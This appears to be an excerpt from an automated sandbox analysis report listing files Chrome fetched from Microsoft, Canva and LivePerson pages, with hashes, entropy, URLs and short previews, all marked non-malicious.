                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma...................mdat.....*..%..B2....,.M4.A$@....p...,p..D*.u.....w.&{..*\.{*b-`y.8...r.L...........g...*.....oq.%R;!....r..l.&X..=....l.x...,v.m5..=R.Q.&.m]./..]+...6........GS<To....OC".Q......$w.2.....Y.......K......\f...g.E...=...G%......].Z...!}.o!..u.......M.!J..4.....Y^.'.O...~ "..$.^.s......0.<...v..Rz.0Z...$....i..%.E....)./M1.........Wn{........Nu.G{.F[....j(..]{...D..L._L.......S......1r.I..k..*..~r...RZF....".|.5....O......U%%.....8..z..W.`.H.}.7.,.....r.bl.4}.1.Rq...1...>Hd.W.N=..8...;.>.....X...d...h...j.B..a..N.d*..7.^.4......Z....p.....TH......b.n*..i<.F.MFy5.^b...!.xb9..../...\d..f.ZN..a.......@.n.....z.a....".Fs.s.ie$.,[QC.&.`..m.....]C.Az......5'F.V....Sl.....".!e5..GO..j
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2663), with CRLF line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):2784
                                                                                                                                                              Entropy (8bit):5.695063076895094
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:54A12B9A3191F324C78E253B9BA9DB9F
                                                                                                                                                              SHA1:203784ACCBBD71007FA1E122EC132E611A6895A8
                                                                                                                                                              SHA-256:1D579FE99F8FE0E90689F1D76A3768359470ABD396C3862A8FA7F16B131CBB02
                                                                                                                                                              SHA-512:419EB4FB0BC4ACDFF78CD19AD53EC0E448EC4FBF92255FA37C95904EF96A2F4B5C06C7EA77890C48FF574C5CC97686976445F9FF25AE4A5CF0877B4966C27A4F
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://fpt2.microsoft.com/Clear.HTML?ctx=Ls1.0&wl=False&session_id=2ffe23f1-4f7c-4685-b828-1a1d4faf3a50&id=09a13d5c-1ee6-45cd-8ee3-1eab5b31098b&w=8DD1BC3D02DCEEC&tkt=H3ihr9e92IdW6yd1ZgQ9S0kvtvZRuOxcpRCTIW%252fmvgzPmOTzDGLtXNaFks8zi1lqetJ1JrOoD3AeO8pqNYloWv7myLZ1kVWGalxnXkrL%252fVZjMSGkTM4aFNu7WBWkbh2%252bwd3tVCETwfwWcMphe2JkURWwys9BamVd9ShUYk%252bt3CeXV6psJtRLOciJVUO8hGcUy89pO15d%252fFhaUaAZWhxAILkNS%252fgCDSm6XgEnDqXEgLBedpxtnYicxr4bquBdQGEBORHMeuk3K5qUSCt4CY5YUVY%252foXf%252fhBGIHR2diFHxwtXVBpM7yy6026%252f6AAik8Ipb&CustomerId=02C58649-E822-405B-B6C3-17A7509D2FCC
                                                                                                                                                              Preview:<!DOCTYPE html>..<html xmlns="http://www.w3.org/1999/xhtml">..<head>.. <title></title>..</head>..<script>function BaseStamp() { this.GetStorageQsInfo = function () { if (window.localStorage) { var n = window.localStorage.getItem(lsKey); var lsupd = "False"; if (lsupd === "true" && n) { var xhr = new XMLHttpRequest(), method = "GET", url = target + "updatels.html?ofid=" + n + "&session_id=" + sid + "&CustomerId=" + cid; xhr.open(method, url, true); xhr.onreadystatechange = function () { if (xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) { var update = xhr.responseText; if (update && update.toLowerCase() === "true") { window.localStorage.setItem(lsKey, id); } } }; xhr.send(); } if (n && n != null && n != "" || (window.localStorage.setItem(lsKey, id), n = id), id != n) return "session_id=" + sid + "&CustomerId=" + cid + "&fid=" + id + "&ofid=" + n + "&w=" + ticks + "&auth=" + encodeURIComponent(authKey) } return "" }; this.newXMLHttp = function () { var n = null; return
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):982
                                                                                                                                                              Entropy (8bit):5.055900899767409
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:FA6F56B2D3037982772378233706C9AF
                                                                                                                                                              SHA1:A511B80627BF05C511F348B3C1AAF4F2FA174365
                                                                                                                                                              SHA-256:BE37586E1929EF52245871FB9FB2C2E2A31A14EE9B421439CA67948EC4036188
                                                                                                                                                              SHA-512:14E7287DEFBE26244B9C19EDAE24B3BFE7E336D41FA1AE85142B8ECB18CC20458953B0BBEC9E10EF6691FDB059494BFE65269AB47D2A2AC49A84D6EF7F2AFFAC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-chat.min.ACSHASHfa6f56b2d3037982772378233706c9af.css
                                                                                                                                                              Preview:#chat-now-link:not(.pmg-chat-active),#chat-button:not(.pmg-chat-active),#pmg-chat-now:not(.pmg-chat-active),#chat-now:not(.pmg-chat-active),#mobile-chat-now:not(.pmg-chat-active){display:none !important}.[data-oc-chat='true'],[data-oc-widget-chat='true'],[data-oc-widget-chat-bot='true']{display:inline-block !important}..proactive-chat-hidden{display:none !important}..lp-iframe-close{display:none}.#lp-iframe-container{border:0;bottom:24px;box-shadow:0 5px 15px 0 rgba(0,0,0,0.25);height:500px;left:auto !important;min-width:300px;max-width:350px;padding:0;position:fixed;right:0;top:auto !important;z-index:1031}.#lp-iframe-container,#lp-iframe-container .lp-iframe-window{border-radius:5px}..lp-live-person .c-flyout{font-size:15px;position:absolute;background:#fff;min-width:128px;max-width:296px;padding:12px;z-index:700;display:none}..lp-live-person [aria-hidden="false"]{display:block}..lp-live-person .lp-iframe-window{border:1px solid transparent;height:500px;width:350px}
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2000x1115, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):193302
                                                                                                                                                              Entropy (8bit):7.99872086651161
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:77507F01516DE198FE89CC0925CD9D4C
                                                                                                                                                              SHA1:7AEA00542BB540ED5CA643256F50B3E648BDB549
                                                                                                                                                              SHA-256:7FAF65E9C8C1C748D2A1FAE08BDF2C3EF9B40BDD6C929F6BCC29889E4559AFA0
                                                                                                                                                              SHA-512:8AE4B80770102443C0DDD19044A461FD27071C35E53A254A43FB082D816247DD2D1586F78AF4E82528EC9EC89C770225158DF4A3037710F7EF2E7105DA708855
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF....WEBPVP8 ....pR...*..[.>...B!.>7 ..a--..:....h...q.....&x......7...o..D..x...?=.f^..*...w.U.7..N......_......y..c.....^..a.....W.o.....O.....1.O.....]...O...........g.5.....?..%.l.../.O._....................?........~...+.G.....?......e...../................?.....=..y.9.......o.?.>......k...m.;.S...O............U........._..........................?.?.z.v......................b.?..g...c....?+...7.G....?.........._......K.;......j?...}S.{........|.....G........f.....[.?.............'......l.....'.w........K.....?..}........._......3.....7.o......!.......OrO-...........?...?....+........?........../.?......S./.......~..,...w....................................\;...O......~.ere.d.....&.+.+Vt.K.-.Gq..(;.5jx.u${PL.FX...F.....).k..YQQ)8.=($;.~.....F.pC......+...v5.=%..8._.....v.7...5.Z..T.._W(...5.s9.F..b.....M.0..{z.KVl}....>...4..c.%Q.v..>.).......,.tLA{F..S...`.b.^.-...!.......Rr..Z|............,...p..b.Y...H..~+.......{;.f.w.`...LD.(...-)i
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:PNG image data, 1720 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):13016
                                                                                                                                                              Entropy (8bit):7.883155506636877
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:F5B4B4F04F1924F9470DC3C0B3E4FC01
                                                                                                                                                              SHA1:28D187B90F70638832771600CD556BC85B418A37
                                                                                                                                                              SHA-256:98FB37F9F0DA54BB17E1322E1A49D5D683854A0BD3DE47C01EB3F0CCBB8B2999
                                                                                                                                                              SHA-512:676E6866C149E56699CA65887D4DB5903CD6F84D32987215F218082E4E441340931221BDED2A78512DEDF417848379DD7E45BF4F87804BC7FEFF7CB3632CB53B
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://lpcdn.lpsnmedia.net/le_unified_window/10.13.0.5-release_5314/resources/icons/desktop/sprites_v1.png?v=10.13.0.5-release_5314%22%20alt=%22End%20conversation
                                                                                                                                                              Preview:.PNG........IHDR.......P.....B.uk....pHYs...........~... .IDATx.....\.u..+{)....b...G9d....hL#....."p-[K.J.6G.;..i4..q.8.0q.vk...QVk#...3.lq...a+....J.....b..vQ....b..)...s..7....w.}.... w~.}3.....k.^.h.....X.z}.a.9<...............-o......c.-..s.Ti.......^x...g_.i...=........\R?0S....sg.....G....o.J.m...].b....u...w.Z...[...}.l...1.~..B...7.\HT?0S...n....y"......z}.^`.4.T....Y......?7w.;..A...X...s..Um..~`..V..G.J,$.5...Mg..#.|...S...O.?..u..7]{....nxK.....?2.<.....N..i...?....=.......q....>..c[..f...#.jG..F.!6.......G.}O.~.*.$..w..+..,....M.>.}....6T$1g?.Z......1.l_5....6.-......-.W.$..B"9!V.q.JCd....G.I.C8...... 4....K....mH....d.&..IT..<.~...,Hp.%.v.@.~.7k......Z.Y......p.^#.....l.35..5I`j'%..1..x.........={.*o....bye..;v..1./~.w[..{@.N...J.mG..z...[w.=x....K....C..\......;....{o....Y..?...K;c..~...u.)m.M...m-.g.}O.MU.7.~._.eK~..UI 6Ht..l6.........F2v....q.zV..TZ..w}v.....h.t...T%..>5.7.$.{A...lsY..2.K..f.b.>....)...K...RL
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (1607)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):8885
                                                                                                                                                              Entropy (8bit):5.250075763010314
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:F0E196B0BE3E72983E981FBB4A492E6E
                                                                                                                                                              SHA1:31A18E3A919413FA9366B68E610B7A27DFEAFF6D
                                                                                                                                                              SHA-256:6ED4E5B157580AD8589E8DD45E4F79F6E899C1D7BD4D1BB3A722EA5902BDABC4
                                                                                                                                                              SHA-512:F9281C7F04BE2D3D7B2B20C9FE2F0A92D579E2743B31D4898BCCF93C52E0DC668AC1D269E79F69EAA05389B197993C092E21775681A3180914EC0A78BB6CB577
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://static.canva.com/web/71f6dba82cb18a30.js
                                                                                                                                                              Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[7689],{../***/ 46468:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var Da=__c.Da;.var rq=function(a){return a instanceof Error?"QuotaExceededError"===a.name||a instanceof DOMException&&22===a.code||a instanceof qq:!1},sq=function(a){const b=Error(a);return c=>{c instanceof Error&&(null==c.stack||""===c.stack)&&(c.stack=b.stack);return c}},tq=function(a){return new Promise((b,c)=>{const d=()=>{a.removeEventListener("success",e);a.removeEventListener("error",g)},e=()=>{d();b(a.result)},f=sq("idb promisify_request_events error"),g=()=>{d();c(f(a.error))};a.addEventListener("success",e);.a.addEventListener("error",g)})},uq=async function(a,b){const c=a.J(a.cursor.request);a.cursor.continue(b);return c},wq=functio
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (64796)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):601590
                                                                                                                                                              Entropy (8bit):5.1132841149611625
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:5851A3C4533D1BE9266FAAD8E3026BF4
                                                                                                                                                              SHA1:304586BE355757BD34C1676E6832776C4CD252FF
                                                                                                                                                              SHA-256:3D315E173769914507E72E4F2AA9ECEEB466975F709FC1176906F61A2DDBD308
                                                                                                                                                              SHA-512:9BE562E48B228E8315B079BB4A3349AD99B29B0C5BF1F370FEAF5BC41B59E30F27B1944B521A60C13BFA5C9E338B206F27709B5A283C7CE4BB1D04849CA504E4
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-reimagine/main-power-platform-all-up.min.ACSHASH5851a3c4533d1be9266faad8e3026bf4.css
                                                                                                                                                              Preview:@charset "UTF-8";/*!. * OneCloud Reimagine v0.309.0. * MWF (Moray) v2.8.1. * Copyright (c) Microsoft Corporation. All rights reserved.. * Copyright 2011-2020 The Bootstrap Authors and Twitter, Inc.. */.fixed-back-to-top{transition:opacity 1s cubic-bezier(.19,1,.22,1)!important;pointer-events:none}@media (prefers-reduced-motion:reduce){.fixed-back-to-top{transition:none}}.fixed-back-to-top.fixed-sticky.stuck{transition:opacity 1s cubic-bezier(.19,1,.22,1)!important}@media (prefers-reduced-motion:reduce){.fixed-back-to-top.fixed-sticky.stuck{transition:none}}@media screen and (max-width:540px){.fixed-back-to-top.stuck{position:static}}.fixed-back-to-top .btn{pointer-events:auto}.fixed-sticky{transition:background .2s ease-out,shadow .2s ease-out}.fixed-sticky .sticky-show-stuck{display:none}.fixed-sticky.get-height .sticky-show-stuck{display:block;visibility:hidden;opacity:0;position:fixed;left:-9999px;width:100%}.fixed-sticky.stuck{position:fixed;left:0;right:0;width:100%;z-index:1020;t
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (4453), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):4453
                                                                                                                                                              Entropy (8bit):5.018502389315502
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:2E8B50A55C1119AC3410D2AE8805FCB6
                                                                                                                                                              SHA1:0609627C9E1D136A563BFA27E35CD51633489A02
                                                                                                                                                              SHA-256:2C6BAE49841AE4F83E45577E91579674D93E89F2ADF0E22773C1AABDAB1C9A61
                                                                                                                                                              SHA-512:508A5D7196551F435D372C2F223244A82D322A1ED93A70F4BBC8F475F2CB13169DB5393BBB1C445B54F573A9ADAE4CFAC7716DD9CA3D33945BD97C6E18A11C64
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:lpCb4584x79946({"id":4281708938,"name":"Power Messaging EN-US","description":"","json":{"logoAltText":"","scheme":{},"surveyAgentChatEnabled":false,"customVars":{},"postChatSurveyOnNonInteractiveChat":false,"sound":true,"smsPreFormId":"","surveyPreChatId":"315072652d636861742073757276657931343838333235343639353239","surveyPostChatEnabled":false,"language":"en-US","sendIconType":"arrow","widgets":false,"attachmentIcon":true,"clearHistory":true,"surveyOfflineId":"344f66666c696e652073757276657931343838333235343639323732","floatingWindow":false,"id":-1,"agentImage":false,"logoRedirectUrl":"","email":true,"agentAvatar":"true","surveyPreChatEnabled":false,"customStyle":{"v":"2.0","meta":{"fonts":{"1":"Arial,Helvetica,sans-serif"},"colors":{"11":"#f2f2f2","1":"#0363ad","2":"#000000","3":"#FFFFFF","4":"#b6b6b6","5":"#6D6E70","6":"#50e6ff","7":"#D2D2D2","8":"#243a5e","9":"#ffffff","10":"#6e6e6e"}},"config":{"transcript_bubble_agent_text":{"attrs":{"style":{"color":"{{colors.2}}","font-weight":"
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):43
                                                                                                                                                              Entropy (8bit):3.0314906788435274
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:325472601571F31E1BF00674C368D335
                                                                                                                                                              SHA1:2DAEAA8B5F19F0BC209D976C02BD6ACB51B00B0A
                                                                                                                                                              SHA-256:B1442E85B03BDCAF66DC58C7ABB98745DD2687D86350BE9A298A1D9382AC849B
                                                                                                                                                              SHA-512:717EA0FF7F3F624C268ECCB244E24EC1305AB21557ABB3D6F1A7E183FF68A2D28F13D1D2AF926C9EF6D1FB16DD8CBE34CD98CACF79091DDDC7874DCEE21ECFDC
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x1062, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):95918
                                                                                                                                                              Entropy (8bit):7.996793040905659
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:0DC5FDC4B6BD260D9B4D084674E77A15
                                                                                                                                                              SHA1:ABF9D3C84F1CEE29C9A392E21EE965F10D64CE3D
                                                                                                                                                              SHA-256:0DA2B9AFDF94213BB81259BE6B7E618076440F777F5B5D1FEB02473B0014071C
                                                                                                                                                              SHA-512:CB96895448C757B159C4C2C4D19EAB5E53BD3AEB70FE4273D4A13CFDBCDEDE87A8C2A8DFC2EC29B49DFB24593C764D7E638EFCBAA367C95BCDA5D25FD91C38D4
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF.v..WEBPVP8 .v.......*..&.>...B!.J./..a--.[1y.2.....A......w|...7...}[......k....}w....f...U..a.'.?.....~..7..s............................?+.p.....s.....g.?....M...+...k.../._....~..............?........S.{.....g...?..................._3..?......8.....g...?.~....w...M.......................g......c..........M...7.?...?.}..?.?..q.g........>..[.?..^.............j......./.?...s.........b.......#.W./.........i...?........3......3._.....O....l...w.....?..q.....;......~..|.....W.g./......q.....?...<i...g.w....`_......._............i.'........._.....o.........W.....................oq_...=.c?.~.....&....Ktk..d.i\..1.rcJ.d...s....OH;.F@.9K....r.9h.w?..v)..]..\.............x...XIx.1.rcJ...+....D...||fMv......x...C.*..DH...0.hyB.......2^4.Li\..1.rcHh.J...%....=3..F(.....h.o..V*ESl'r.)..w.y......]tk..d.i\..1.4J%...........V..y.[.,.....<.]A$....]~..4,....+..W&4.Li\..0.p.I.k$....D..".../.......u..z..&."._.....a%.J...+..W.[.....@....Z
                                                                                                                                                              No static file info